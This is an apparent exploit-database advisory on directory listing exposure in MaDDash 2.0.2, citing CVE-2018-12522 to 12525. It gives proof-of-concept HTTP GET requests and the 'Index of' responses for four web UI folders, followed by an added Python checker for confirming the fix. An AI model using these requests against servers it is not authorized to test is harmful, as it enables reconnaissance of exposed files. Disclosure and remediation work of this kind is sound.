ManhNho

MaDDash 2.0.2 - Directory Listing

Jun 17th, 2018
# Exploit Title: MaDDash 2.0.2 - Directory Listing
# Date: 2018-06-18
# Vendor: perfSONAR
# Download Link: https://github.com/esnet/maddash/archive/master.zip
# Version: 2.0.2
# Exploit Author: ManhNho
# CVE: CVE-2018-12522,CVE-2018-12523,CVE-2018-12524,CVE-2018-12525
# Category: Webapps
# Tested on: Windows 7

--- Description ---
A directory listing is inappropriately exposed, yielding potentially sensitive information to attackers.
A directory listing provides an attacker with the complete index of all the resources located inside of the directory.
The specific risks and consequences vary depending on which files are listed and accessible.

--- Affected items ---
http://127.0.0.1/maddash-webui/etc/
http://127.0.0.1/maddash-webui/lib/
http://127.0.0.1/maddash-webui/images/
http://127.0.0.1/maddash-webui/style/

--- PoC ---

[*] Request 1:
GET /maddash-webui/etc/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: color=Gray Unknown
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

[*] Response 1:
HTTP/1.1 200 OK
Date: Sun, 17 Jun 2018 19:48:30 GMT
Server: Apache/2.2.15 (CentOS)
Content-Length: 876
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /maddash-webui/etc</title>
</head>
<body>
<h1>Index of /maddash-webui/etc</h1>
--------------------------------------------------------------------------------------

[*] Request 2:
GET /maddash-webui/lib/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: color=Gray Unknown
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

[*] Response 2:
HTTP/1.1 200 OK
Date: Sun, 17 Jun 2018 19:48:31 GMT
Server: Apache/2.2.15 (CentOS)
Content-Length: 2555
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /maddash-webui/lib</title>
</head>
<body>
<h1>Index of /maddash-webui/lib</h1>
--------------------------------------------------------------------------------------

[*] Request 3:
GET /maddash-webui/style/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: color=Gray Unknown
Connection: close
Upgrade-Insecure-Requests: 1

[*] Response 3:
HTTP/1.1 200 OK
Date: Sun, 17 Jun 2018 19:52:51 GMT
Server: Apache/2.2.15 (CentOS)
Content-Length: 1928
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /maddash-webui/style</title>
</head>
<body>
<h1>Index of /maddash-webui/style</h1>
--------------------------------------------------------------------------------------

[*] Request 4:
GET /maddash-webui/images/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: color=Gray Unknown
Connection: close
Upgrade-Insecure-Requests: 1

[*] Response 4:
HTTP/1.1 200 OK
Date: Sun, 17 Jun 2018 19:53:02 GMT
Server: Apache/2.2.15 (CentOS)
Content-Length: 2143
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /maddash-webui/images</title>
</head>
<body>
<h1>Index of /maddash-webui/images</h1>
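
--- Added example: verifying the fix ---
The responses above share one signature: a 200 with an HTML body whose title and h1 both read "Index of <path>". The Python below is an added example, not part of the original advisory or of MaDDash; it classifies a saved raw response for one of the affected paths, so an operator can confirm that a listing is gone after disabling indexing (for Apache, Options -Indexes on the directory). The function names and the FORBIDDEN sample are assumptions constructed for illustration.

```python
import re
from email.parser import Parser

_TITLE = re.compile(r"<title>\s*Index of\s+(/[^<]*)</title>", re.I)
_H1 = re.compile(r"<h1>\s*Index of\s+(/[^<]*)</h1>", re.I)

# Head of "Response 1" as shown in the advisory (body is cut off there too).
LISTING = """HTTP/1.1 200 OK
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /maddash-webui/etc</title>
</head>
<body>
<h1>Index of /maddash-webui/etc</h1>
"""
# Constructed sample: what a server with indexing disabled typically returns.
FORBIDDEN = """HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=iso-8859-1

<html><head><title>403 Forbidden</title></head><body></body></html>
"""

def parse_response(raw):
    """Split a raw HTTP response into (status, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    status_line, _, header_block = head.partition("\n")
    parts = status_line.split(None, 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError("not an HTTP response: %r" % status_line)
    return int(parts[1]), Parser().parsestr(header_block, headersonly=True), body

def is_autoindex(raw, path):
    """True only for a 200 HTML page whose title and h1 both name this path."""
    status, headers, body = parse_response(raw)
    if status != 200 or "html" not in headers.get("Content-Type", "").lower():
        return False
    want = path.rstrip("/")
    title, h1 = _TITLE.search(body), _H1.search(body)
    return bool(title and h1
                and title.group(1).strip().rstrip("/") == want
                and h1.group(1).strip().rstrip("/") == want)

def exposed_paths(responses):
    """responses maps request path -> raw response; returns paths still listed."""
    return sorted(p for p, raw in responses.items() if is_autoindex(raw, p))
```

Requiring the title and h1 to match the requested path keeps an ordinary page that merely contains the words "Index of" from being flagged.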